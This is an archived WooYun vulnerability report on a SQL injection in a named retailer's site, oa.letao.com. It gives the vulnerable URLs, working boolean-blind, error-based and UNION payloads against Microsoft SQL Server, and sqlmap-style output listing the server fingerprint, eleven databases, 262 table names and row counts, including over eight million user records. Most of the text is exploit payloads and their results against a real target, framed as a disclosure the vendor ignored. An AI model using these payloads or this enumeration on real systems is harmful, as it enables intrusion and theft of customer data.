乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-13: 细节已通知厂商并且等待厂商处理中 2015-07-18: 厂商已经主动忽略漏洞,细节向公众公开
1,http://oa.letao.com/wap/app_download.aspx?bid=14&op=brand2,http://oa.letao.com//wap/shoe.aspx?add=&iid=1
---Parameter: bid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: bid=14 AND 3089=3089&op=brand Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: bid=14 AND 1901=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(106)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (1901=1901) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(98)+CHAR(113)))&op=brand Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: bid=14 UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(106)+CHAR(106)+CHAR(113)+CHAR(81)+CHAR(114)+CHAR(119)+CHAR(71)+CHAR(105)+CHAR(99)+CHAR(70)+CHAR(107)+CHAR(65)+CHAR(72)+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(98)+CHAR(113),NULL,NULL,NULL-- &op=brand---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Microsoft SQL Server 2008current user: 'letao_user'available databases [11]:[*] ASPState[*] distribution[*] ImagesRecord[*] letao_accounting[*] Letao_Web_Log[*] letaoerp[*] master[*] model[*] msdb[*] tempdb[*] zcltestDatabase: letaoerp[262 tables]+------------------------------------+| Addressee || BRAND_TECH || Brand || CH_ACCOUNT_BALANCE || CH_BOX_ORDER_DETAIL || CH_BOX_ORDER_DETAIL || CH_LOG || CH_RETURN_ORDER_DETAIL || CH_RETURN_ORDER_DETAIL || CH_RETURN_ORDER_RECORD || CH_SELL_ORDER_ADJUST || CH_SELL_ORDER_ADJUST || CH_SELL_ORDER_DETAIL || CH_SELL_ORDER_RECORD || CH_SELL_SCHEDULE_ORDER_DETAIL || CH_SELL_SCHEDULE_ORDER_DETAIL || CH_SHIP_ORDER_DETAIL || CH_SHIP_ORDER_DETAIL || CmsContent || Dealer || ERP_ADDR_AREA || ERP_ADDR_CITY || ERP_ADDR_PROVINCE || ERP_AD_DEFINE || ERP_AD_PLAN || ERP_ARTICLE_CONTENT || ERP_ARTICLE_CONTENT || ERP_ARTICLE_TYPE || ERP_BANK_BANK_CODE || ERP_BANK_BRANCH_LIST || ERP_BANK_CITY_LIST || ERP_BAOSHENG_STOCK || ERP_CHANNEL_PROMOTION_TABLE || ERP_COUPAN_BATCH || ERP_COUPAN_CAMPAIGN || ERP_COUPAN_EXCEPTION || ERP_COUPAN_RECORD || ERP_COUPAN_SECTION || ERP_COUPAN_USER_ALLOCATED || ERP_COUPON_DANPINPAI_LIST || ERP_COUPON_DANPIN_LIST || ERP_CO_PAY_RECORD_ONLINE || ERP_CO_REFUND_ORDER || ERP_CO_REJECT_ORDER || ERP_CUSTOMER || ERP_DEALER_PRODUCT_LIST || ERP_DEALER_STOCK_EXCEPTION || ERP_DEALER_STOCK_LIST || ERP_DEFECT_WARE_DETAIL || ERP_DEFECT_WARE_DETAIL || ERP_EDM_BATCH_SEND || ERP_EDM_UNSUBSCRIBER || ERP_EXPRESS_CONTRACT || ERP_EXPRESS_FORM_DEFINE || ERP_GIFT_CARD_DEFINE || ERP_GIFT_CARD_RECORD || ERP_INVENTORY_DIFFERENCE || ERP_INVENTORY_DIFFERENCE || ERP_INVENTORY_DIFF_ADJUST || ERP_INVENTORY_RESULT2 || ERP_INVENTORY_RESULT2 || ERP_INVENTORY_SCAN || ERP_INVENTORY_TASK || ERP_IPHONE_MESSAGE || ERP_InvitePraise_For_TaoBao || ERP_JOB || ERP_JUSHOU_INFO || ERP_KEYWORD_TRANSFER || ERP_MARKET_LIBAO || ERP_MARKET_ORDERGIFT || ERP_MARKET_PRODUCTGIFT || ERP_MARKET_URL || ERP_MATERIAL_APPLY_DETAIL || ERP_MATERIAL_APPLY_DETAIL || ERP_MATERIAL_DEALER || ERP_MATERIAL_ORDER || ERP_MATERIAL_PURCHASE_DETAIL || ERP_MATERIAL_PURCHASE_DETAIL || ERP_MATERIAL_STAT || ERP_MATERIAL_STOCK || ERP_MATERIAL_TRANSFER_DETAIL || ERP_MATERIAL_TRANSFER_DETAIL || ERP_MIAOSHA || ERP_MILK_API_LOG || ERP_MILK_APP_CONFIG || ERP_MOBILE_CATEGORY_CMS || ERP_MOBILE_MIAOSHA_V2_DETAIL || ERP_MOBILE_MIAOSHA_V2_DETAIL || ERP_MOBILE_MIAOSHA_V2_DETAIL || ERP_MOBILE_SMS_BATCH_SEND || ERP_MiniSite_CSS || ERP_MiniSite_PageSource || ERP_MiniSite_Page_CSS || ERP_MiniSite_Page_Script || ERP_MiniSite_Script || ERP_NEARESST_DELIVERY || ERP_ONTHEHOUR_COUPAN || ERP_OP_ITEM_LOCK || ERP_OP_ITEM_LOG || ERP_ORDER_NOTIFY_HISTORY || ERP_ORDER_NOTIFY_HISTORY || ERP_PHONE_LOG || ERP_PHONE_NAMELOG || ERP_PO_SHIP_ORDER_DETAIL || ERP_PO_SHIP_ORDER_DETAIL || ERP_PRICE_FORMULA || ERP_PRODUCT_CATEGORY_DEFINE || ERP_PRODUCT_CHANGELOG || ERP_PRODUCT_DISCOUNT_DEFINE || ERP_PRODUCT_PRICE_MANAGER || ERP_PRODUCT_PROPERTIES || ERP_PRODUCT_PROPERTY_DEFINE || ERP_PROD_PRICE_CHANGELOG || ERP_PROMOTION_CATEGORY_LINK || ERP_PROMOTION_CATEGORY_LINK || ERP_PROMOTION_LIST || ERP_PROMOTION_PRICE_FORMULA || ERP_PROMOTION_PRODUCT || ERP_PURCHASE_DEFER_ORDER || ERP_PURCHASE_IMG || ERP_PURCHASE_ORDER_DETAIL || ERP_PURCHASE_ORDER_DETAIL || ERP_ProductOnlyCode || ERP_QQ_COUPAN_MAP_TABLE || ERP_QUE_TUI_HUO_RECORD || ERP_RECEIPT_ORIGINAL || ERP_RESTORE || ERP_RETURN_BY_EXPRESS_DETAIL || ERP_RETURN_BY_EXPRESS_DETAIL || ERP_RETURN_BY_EXPRESS_PROVINCE || ERP_RETURN_ORDER || ERP_RO_RESERVE_PROD_DETAIL || ERP_SALES_ORDER_DETAIL || ERP_SALES_ORDER_DETAIL || ERP_SALES_PREDICTION_BASE || ERP_SEM_KEYWORD_LIB || ERP_SEM_PROD_SKU_LIST || ERP_SEO_CHANEL_CLASS_URL || ERP_SEO_CHANEL_LEXICON || ERP_SEO_CHANEL_PAGE_CLASS || ERP_SEO_CHANEL_PAGE_KEY || ERP_SHIPPING_RECORD_DETAIL || ERP_SHIPPING_RECORD_DETAIL || ERP_SHOE_BRAND_SIZE_TABLE || ERP_SITE_MESSAGE || ERP_SITE_TEMPLATE_CMS || ERP_SO_BANKINFO || ERP_SO_BATCH || ERP_SO_DE_PRICE_DETAIL || ERP_STOCK_MAIN || ERP_STOCK_PICKUP_FORM_DETAIL || ERP_STOCK_PICKUP_FORM_DETAIL || ERP_STOCK_PROD_MOVE_DETAIL || ERP_STOCK_PROD_MOVE_DETAIL || ERP_STOCK_RETURN_DEALER_FORM || ERP_STOCK_RETURN_DEALER_RECORD || ERP_STOCK_SHELF_DEFINE || ERP_STOCK_TRANSFER || ERP_STOCK_UPC || ERP_STOCK_UPLOADSHELF_DETAIL || ERP_STOCK_UPLOADSHELF_FORM || ERP_ShippingTimeOutRule || ERP_TALLY_DIFFERENCE || ERP_TALLY_SCAN || ERP_TALLY_TASK_DETAIL || ERP_TALLY_TASK_DETAIL || ERP_TRANSFER_RULE || ERP_TUANGOU || ERP_Tie_Shoes_Method || ERP_Tie_Shoes_Step || ERP_UNION_LMWL_LIB || ERP_UNION_LMWL_LIB || ERP_UNION_NOTITY || ERP_UNION_PRE_REGISTER || ERP_UNION_STEP_RATIO || ERP_USERS || ERP_USER_ADMIN_LOG || ERP_USER_BIND_UNION_TABLE || ERP_USER_BLACKLIST || ERP_USER_COMMENT || ERP_USER_IP_RESTRICTION || ERP_USER_LOGIN_LOG || ERP_USER_WUYOU_CARD_LOG || ERP_USER_WUYOU_CARD_LOG || ERP_WAREHOUSE_PART || ERP_WAREHOUSE_PRINTER_SETTING || ERP_WEIBO_ERROR || ERP_WEIBO_KEYWORD || ERP_WEIBO_MESSAGE_LOG || ERP_WEIBO_MESSAGE_LOG || ERP_WORK_ORDER_BEFOREREFUND_DETAIL || ERP_WORK_ORDER_BEFOREREFUND_DETAIL || ERP_WORK_ORDER_CALLIN_DETAIL || ERP_WORK_ORDER_DETAIL || ERP_WORK_ORDER_EXPRESS || ERP_WORK_ORDER_LOG || ERP_WORK_ORDER_PHONE_LOG || ERP_WORK_ORDER_PORC_DETAIL || ERP_WORK_ORDER_RETURN_DETAIL || ERP_WORK_ORDER_STAFF_ONLINE_LOG || ERP_WORK_ORDER_TYPE_TIME_SET || ERP_WORK_ORDER_UNUSUAL_DETAIL || ERP_WORK_ORDER_UPGRADE_DETAIL || ERP_WORK_ORDER_UPGRADE_STAT_DETAIL || ERP_WorkOrder_Group_Member || ERP_WorkOrder_Group_Member || EXPRESS_COMPANY_USER || EXPRESS_DISTRIBUTE_RULE || Erp_tie_shoes_posterDes || ExpressCompany || FREE_TUAN_ORDER_DETAIL || FREE_TUAN_ORDER_FORM || INVOICE_PRINT || INVOICE_PRINT || Image || ORDER_COUPAN_RELATIONS || OrderDetail || OrderForm || OrderStatus || PRODUCT_BRAND_TECH_MAP || PROMO_SETTING || Payments || Po_Detail || ProdComment || ProductPresellDetail || ProductPresellDetail || ProductPresellDetail || Product_Style || PurChase_Order || SHIPPING_EXPENSE_RULE || SHIPPING_EXPENSE_RULE || SHIP_ORDER_DETAIL || SITE_SOURCE_BIND_TALBE || STOCK_BASE || STOCK_LOG || Shipping_Order || Storehouse || Third_Part_Logistics_Cost || Third_Part_Order_Syn || Third_Part_Sales_Prom_Detail || Third_Part_Sales_Prom_Detail || Third_Part_Sales_Prom_Log || Third_Part_Shop_Product || Transfer || UNION_PAPERS_IMG || UNION_PROMOTION || UN_Member || UN_S_Member || UN_School || USER_BLACKLIST || USER_UNION_BIND_TABLE || UnionIp || Union_Keys || UserCMS || Users || VIRTUAL_ACCOUNT_DETAIL || VIRTUAL_ACCOUNT_DETAIL || aa_neigou || erp_temp_order_commetnt || erp_temp_product || erp_temp_users || sysdiagrams |+------------------------------------+Database: letaoerp+----------------------------------------+---------+| Table | Entries |+----------------------------------------+---------+| dbo.Users | 8239897 || dbo.STOCK_BASE | 5395797 || dbo.STOCK_LOG | 4835160 || dbo.OrderForm | 4029015 || dbo.ERP_SHIPPING_RECORD_DETAIL | 3999741 || dbo.ERP_SHIPPING_RECORD_DETAIL | 3999741 || dbo.ERP_WORK_ORDER_LOG | 3592011 || dbo.Shipping_Order | 3250157 || dbo.ERP_STOCK_PICKUP_FORM_DETAIL | 3179602 || dbo.ERP_STOCK_PICKUP_FORM_DETAIL | 3179602 || dbo.OrderDetail | 3152279 || dbo.ERP_STOCK_PROD_MOVE_DETAIL | 3023639 || dbo.ERP_STOCK_PROD_MOVE_DETAIL | 3023639 || dbo.Addressee | 2327577 || dbo.CH_SELL_ORDER_DETAIL | 1822130 || dbo.ERP_ORDER_NOTIFY_HISTORY | 1693994 || dbo.ERP_ORDER_NOTIFY_HISTORY | 1693994 || dbo.ERP_PHONE_LOG | 1344950 || dbo.Po_Detail | 1279008 || dbo.ERP_CO_PAY_RECORD_ONLINE | 1254242 || dbo.ERP_STOCK_RETURN_DEALER_RECORD | 1038093 || dbo.ERP_QQ_COUPAN_MAP_TABLE | 965219 || dbo.ERP_SITE_MESSAGE | 948726 || dbo.ERP_COUPAN_RECORD | 916635 || dbo.ERP_PRODUCT_PROPERTIES | 858909 || dbo.ERP_COUPAN_USER_ALLOCATED | 714693 || dbo.CH_SHIP_ORDER_DETAIL | 707145 || dbo.CH_SHIP_ORDER_DETAIL | 707145 || dbo.SHIP_ORDER_DETAIL | 664185 || dbo.Image | 618299 || dbo.CH_BOX_ORDER_DETAIL | 605770 || dbo.CH_BOX_ORDER_DETAIL | 605770 || dbo.ERP_TALLY_SCAN | 586193 || dbo.ProdComment | 547894 || dbo.ERP_STOCK_UPC | 516154 || dbo.ERP_QUE_TUI_HUO_RECORD | 511366 || dbo.ERP_USER_LOGIN_LOG | 484013 || dbo.ERP_STOCK_MAIN | 466099 || dbo.ERP_STOCK_UPLOADSHELF_DETAIL | 442979 || dbo.ERP_INVENTORY_SCAN | 382799 || dbo.CH_SELL_ORDER_RECORD | 376943 || dbo.ERP_USER_COMMENT | 341964 || dbo.CH_RETURN_ORDER_DETAIL | 331885 || dbo.CH_RETURN_ORDER_DETAIL | 331885 || dbo.ERP_SEM_KEYWORD_LIB | 325055 || dbo.CH_SELL_SCHEDULE_ORDER_DETAIL | 257717 || dbo.CH_SELL_SCHEDULE_ORDER_DETAIL | 257717 || dbo.ERP_PROD_PRICE_CHANGELOG | 235138 || dbo.ERP_RETURN_ORDER | 213133 || dbo.ERP_MATERIAL_PURCHASE_DETAIL | 211566 || dbo.ERP_MATERIAL_PURCHASE_DETAIL | 211566 || dbo.UN_Member | 204152 || dbo.ERP_WORK_ORDER_PORC_DETAIL | 192531 || dbo.USER_UNION_BIND_TABLE | 179191 || dbo.ERP_CO_REFUND_ORDER | 165652 || dbo.ERP_MATERIAL_APPLY_DETAIL | 154021 || dbo.ERP_MATERIAL_APPLY_DETAIL | 154021 || dbo.ERP_OP_ITEM_LOG | 144944 || dbo.erp_temp_users | 136718 || dbo.ERP_SO_BATCH | 117908 || dbo.ERP_SALES_PREDICTION_BASE | 111691 || dbo.ERP_RO_RESERVE_PROD_DETAIL | 106470 || dbo.ERP_BANK_BRANCH_LIST | 104040 || dbo.ERP_PROMOTION_PRODUCT | 102297 || dbo.ERP_DEALER_PRODUCT_LIST | 100814 || dbo.ERP_PRODUCT_DISCOUNT_DEFINE | 99256 || dbo.ERP_PHONE_NAMELOG | 98998 || dbo.ERP_WORK_ORDER_PHONE_LOG | 98813 || dbo.ERP_TRANSFER_RULE | 92939 || dbo.INVOICE_PRINT | 88421 || dbo.INVOICE_PRINT | 88421 || dbo.ERP_PRODUCT_CHANGELOG | 78748 || dbo.ERP_WORK_ORDER_CALLIN_DETAIL | 78374 || dbo.aa_neigou | 70863 || dbo.CH_RETURN_ORDER_RECORD | 66166 || dbo.ERP_PO_SHIP_ORDER_DETAIL | 60918 || dbo.ERP_PO_SHIP_ORDER_DETAIL | 60918 || dbo.ERP_COUPAN_EXCEPTION | 58539 || dbo.ERP_WORK_ORDER_UPGRADE_DETAIL | 56482 || dbo.ERP_MILK_API_LOG | 54401 || dbo.ERP_WEIBO_ERROR | 45348 || dbo.ERP_PROMOTION_PRICE_FORMULA | 42021 || dbo.ERP_WEIBO_MESSAGE_LOG | 41342 || dbo.ERP_WEIBO_MESSAGE_LOG | 41342 || dbo.Third_Part_Shop_Product | 36895 || dbo.ERP_SALES_ORDER_DETAIL | 35119 || dbo.ERP_SALES_ORDER_DETAIL | 35119 || dbo.ERP_PRODUCT_PRICE_MANAGER | 34158 || dbo.ERP_BAOSHENG_STOCK | 32675 || dbo.ERP_SO_BANKINFO | 30541 || dbo.ERP_WORK_ORDER_RETURN_DETAIL | 29362 || dbo.PurChase_Order | 28715 || dbo.ERP_TALLY_DIFFERENCE | 25595 || dbo.ERP_CO_REJECT_ORDER | 25304 || dbo.ERP_EDM_UNSUBSCRIBER | 22657 || dbo.ERP_WORK_ORDER_UNUSUAL_DETAIL | 21936 || dbo.ERP_WORK_ORDER_DETAIL | 21171 || dbo.ERP_RECEIPT_ORIGINAL | 18023 || dbo.ERP_STOCK_UPLOADSHELF_FORM | 17912 || dbo.ERP_PURCHASE_ORDER_DETAIL | 16832 || dbo.ERP_PURCHASE_ORDER_DETAIL | 16832 || dbo.ERP_INVENTORY_DIFFERENCE | 15604 || dbo.ERP_INVENTORY_DIFFERENCE | 15604 || dbo.ERP_DEALER_STOCK_LIST | 15507 || dbo.CH_SELL_ORDER_ADJUST | 14740 || dbo.CH_SELL_ORDER_ADJUST | 14740 || dbo.FREE_TUAN_ORDER_DETAIL | 14597 || dbo.ERP_JUSHOU_INFO | 14307 || dbo.ERP_WORK_ORDER_UPGRADE_STAT_DETAIL | 14305 || dbo.Product_Style | 13451 || dbo.ERP_SEO_CHANEL_PAGE_KEY | 13430 || dbo.FREE_TUAN_ORDER_FORM | 12964 || dbo.ERP_ARTICLE_CONTENT | 12434 || dbo.ERP_ARTICLE_CONTENT | 12434 || dbo.ERP_SEM_PROD_SKU_LIST | 11887 || dbo.ERP_ProductOnlyCode | 11060 |。。。。。。
数据量太大。赶紧修复吧!
危害等级:无影响厂商忽略
忽略时间:2015-07-18 21:08
漏洞Rank:15 (WooYun评价)
暂无
